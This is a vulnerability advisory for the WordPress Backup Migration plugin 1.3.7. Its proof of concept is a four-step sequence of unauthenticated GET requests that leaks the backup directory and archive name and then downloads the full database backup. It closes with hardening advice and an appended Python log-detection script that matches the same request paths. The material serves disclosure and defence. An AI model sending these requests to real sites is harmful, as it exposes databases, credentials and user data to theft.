=============================================================================================================================================
| # Title : WordPress Plugin Backup Migration 1.3.7 Unauthenticated Database Backup |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/backup-backup/ |
=============================================================================================================================================

POC :

Description:

The Backup Migration WordPress plugin (version 1.3.7) allows unauthenticated users to access sensitive backup files, potentially exposing the full database and website content. An attacker can retrieve backup archives without authentication.

Impact:

An attacker can:
- Download full database backups.
- Access sensitive configuration and user data.
- Potentially compromise the entire WordPress installation.

Technical Details / Proof of Concept (PoC):

1) Get the version of the plugin:

GET /wp-content/plugins/backup-backup/readme.txt

Response:
--------------------------------------------------------------------------
Stable tag: 1.3.7
--------------------------------------------------------------------------

2) Get the name of the backup directory:

GET /wp-content/backup-migration/config.json

Response:
--------------------------------------------------------------------------
{
  [...],
  "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
  [...],
  "OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups:

GET /wp-content/backup-migration/complete_logs.log

Response:
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download:

GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

Recommendation:
- Restrict access to backup directories via .htaccess or web server configuration.
- Do not store backups in publicly accessible paths.
- Apply authentication checks before serving backup files.
- Update the plugin if a secure version is released by the vendor.

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
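A defender-side detection check for the four-step chain above, added here as an example and not part of the advisory: it parses Apache combined-format access log lines, maps each request to the step it belongs to (config.json read, complete_logs.log read, archive download from the randomised backup-migration-* directory), and reports per client whether the archive was actually served. The log lines, addresses and directory suffix are constructed for the example.

```python
import re

# Constructed Apache combined-format access log lines; addresses, times and the
# random directory suffix are invented for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2025:10:00:02 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 200 1840 "-" "curl/8.5.0"
203.0.113.7 - - [10/Dec/2025:10:00:03 +0000] "GET /wp-content/backup-migration/complete_logs.log HTTP/1.1" 200 9211 "-" "curl/8.5.0"
203.0.113.7 - - [10/Dec/2025:10:00:05 +0000] "GET /wp-content/backup-migration-aB3dEf9Gh1/backups/BM_Backup_2025-12-09_00_00_00_zZyYxXwWvVuU.zip HTTP/1.1" 200 58120394 "-" "curl/8.5.0"
198.51.100.9 - - [10/Dec/2025:10:01:10 +0000] "GET /wp-content/backup-migration/config.json?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# One pattern per step of the chain: plugin config, plugin log, backup archive.
STAGES = {
    "config_read": re.compile(r"^/wp-content/backup-migration/config\.json$"),
    "log_read": re.compile(r"^/wp-content/backup-migration/complete_logs\.log$"),
    "archive_download": re.compile(r"^/wp-content/backup-migration-[^/]+/backups/BM_Backup_[^/]+\.zip$"),
}

def classify_path(path):
    """Return the chain step a request path belongs to, or None."""
    path = path.split("?", 1)[0]  # a query string does not change the target file
    return next((name for name, rx in STAGES.items() if rx.match(path)), None)

def analyze(log_text):
    """Group matching requests per client and report how far the chain got.
    Only 2xx responses count as exposure; blocked probes are still reported."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        stage = classify_path(m["path"]) if m else None
        if stage is None:
            continue
        rec = per_ip.setdefault(m["ip"], {"attempted": set(), "served": set()})
        rec["attempted"].add(stage)
        if m["status"].startswith("2"):
            rec["served"].add(stage)  # the file actually left the server
    findings = {}
    for ip, rec in per_ip.items():
        if "archive_download" in rec["served"]:
            verdict = "backup exfiltrated"
        elif rec["served"]:
            verdict = "recon succeeded"
        else:
            verdict = "attempt blocked"
        findings[ip] = {"verdict": verdict, "served": sorted(rec["served"]), "attempted": sorted(rec["attempted"])}
    return findings
```

Any 2xx on config.json or complete_logs.log is already a finding worth acting on, since both files are only needed by the plugin itself and should be blocked at the web server as the recommendations state.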